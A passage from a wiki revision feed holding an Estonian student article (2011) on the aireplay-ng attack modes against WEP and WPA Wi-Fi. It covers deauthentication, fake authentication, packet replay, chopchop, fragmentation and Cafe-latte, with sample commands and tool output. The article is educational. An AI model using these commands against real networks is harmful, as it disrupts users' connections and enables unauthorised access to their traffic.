Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32779</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32779"/>
		<updated>2011-05-24T18:31:36Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Broadcast */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
